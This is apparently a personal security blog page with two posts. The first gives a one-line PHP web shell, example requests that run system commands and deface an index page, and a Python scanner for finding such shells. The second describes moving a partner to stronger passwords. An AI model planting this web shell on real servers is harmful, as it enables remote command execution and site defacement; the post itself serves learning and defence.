Single Line PHP Script to Gain Shell

A while ago, on PaulDotCom Security Weekly, I heard someone mention something about a single line PHP script to get shell on the web server. I knew it couldn’t be that hard as it’s only one line, but I didn’t find much about it on Google when I searched, perhaps because it’s too easy, or perhaps I was using the wrong search terms. Anyway, I forgot about it for a while… until now.

Since WebApp security is what I’m most interested in at the moment, I have been learning PHP. I’m not finished learning yet, but today (while reading about how inputs should be sanitised before using “include”) I remembered the single line PHP shell, had a go, and this is what I came up with:

<?php echo shell_exec($_GET['e'].' 2>&1'); ?>

Obviously the WebApp would have to be vulnerable in some way in order to be able to put this script on the server, but once it was, it could potentially be used to do things like dump files and deface the site.

The output is just text, not an HTML document so if using a web browser, you will want to view the source in order to see the proper result.

I used shell_exec() instead of just exec() because it returns every line instead of just the last one. An alternative is to use passthru() which will also send binary data, but to get that to work properly with binary data, you’d probably have to also set the headers which makes it more than one line.

I was able to run Unix commands (Windows commands should also work if the host is running Windows) such as:

  • shell.php?e=whoami
  • shell.php?e=pwd
  • shell.php?e=uname%20-a (I had to URL encode the spaces, otherwise my browser thought it should search using Google)
  • shell.php?e=echo%20This%20site%20has%20been%20hacked%3Eindex.html
  • shell.php?e=ls%20-l%20/tmp

The last command even showed me some files and their owners, which in turn (because I am using a shared host) told me the names of some of the other sites that are running on the same server as mine, which was an unexpected “bonus” find.
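One way a defender might look for files like this under a web root, as an added example that is not part of the original post: a small Python check that flags PHP source where a command-execution function is called with request input directly in its arguments. The function list beyond shell_exec, exec and passthru, the sample file names and their contents are assumptions constructed for illustration, and input copied into a variable before the call is not tracked.

```python
import re

# PHP functions that pass a string to the OS shell (first three are from the post).
EXEC_FUNCS = ("shell_exec", "exec", "passthru", "system", "popen", "proc_open")
TAINTED = ("$_GET", "$_POST", "$_REQUEST", "$_COOKIE")  # request-controlled input

# The lookbehind skips curl_exec(), $pdo->exec(), Foo::exec() and $exec().
CALL_RE = re.compile(r"(?<![\w>:$])(" + "|".join(EXEC_FUNCS) + r")\s*\(", re.I)

def call_args(src, open_idx):
    """Text between the '(' at open_idx and its matching ')', skipping strings."""
    depth, quote, i = 0, None, open_idx
    while i < len(src):
        ch = src[i]
        if quote:
            if ch == "\\":
                i += 1                      # skip the escaped character
            elif ch == quote:
                quote = None
        elif ch in "'\"":
            quote = ch
        elif ch == "(":
            depth += 1
        elif ch == ")":
            depth -= 1
            if depth == 0:
                return src[open_idx + 1:i]
        i += 1
    return src[open_idx + 1:]               # unbalanced: keep the remainder

def find_tainted_exec(src):
    """Return [(line, function, source)] for direct request-to-shell calls."""
    findings = []
    for m in CALL_RE.finditer(src):
        args = call_args(src, m.end() - 1)
        hit = next((v for v in TAINTED if v in args), None)
        if hit:
            line = src.count("\n", 0, m.start()) + 1
            findings.append((line, m.group(1).lower(), hit))
    return findings

# Constructed sample files (name -> contents), not taken from a real site.
SAMPLES = {
    "shell.php": "<?php echo shell_exec($_GET['e'].' 2>&1'); ?>",
    "raw.php": "<?php\nheader('Content-Type: text/plain');\npassthru($_REQUEST['c']);\n",
    "thumb.php": "<?php\n$f = escapeshellarg($_GET['f']);\nexec('convert ' . $f);\n",
    "db.php": "<?php $pdo->exec($_POST['q']); ?>",
}
print({name: find_tainted_exec(src) for name, src in SAMPLES.items()})
```

Only shell.php and raw.php are reported; thumb.php escapes its input before the call and db.php calls a database method, not the shell function.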

My Fiancée is Using Better Passwords Than Me!

I upgraded my Mac laptop to OS X 10.8 Mountain Lion a few weeks ago, and at the same time I decided to turn on FileVault for (almost) full disk encryption. I’m not paranoid, but if I want to get into infosec, I should at least try to be secure myself.

Around the same time my fiancée had said that her Windows laptop was running slow, and then her hotmail account got compromised. I checked her laptop for anything malicious (all seemed ok) but I didn’t have time to try and find out why it was running slow right then, so I set her up with an account on my Mac laptop. I had not enforced any password policy on my Mac laptop (I’m not even sure how to do that – I’ll have to find out soon), so I asked her if she would mind telling me what password she had used because her password would be able to unlock the FileVault (almost) full disk encryption and her password could be the weak link.

She obviously trusts me because she told me, and I knew from experience with John the Ripper/Hashcat/etc. that it would easily be cracked using brute force by the proper tools in a matter of seconds because it followed a very common pattern. It turned out that her hotmail account was using a similarly simple password, so it was no great surprise that it had been compromised.

I explained with the help of this great XKCD comic that a password can be hard to crack, but easy to remember:

She is now using passwords around 30 characters long! This means some of her passwords are probably stronger than some of mine… I have some catching up to do!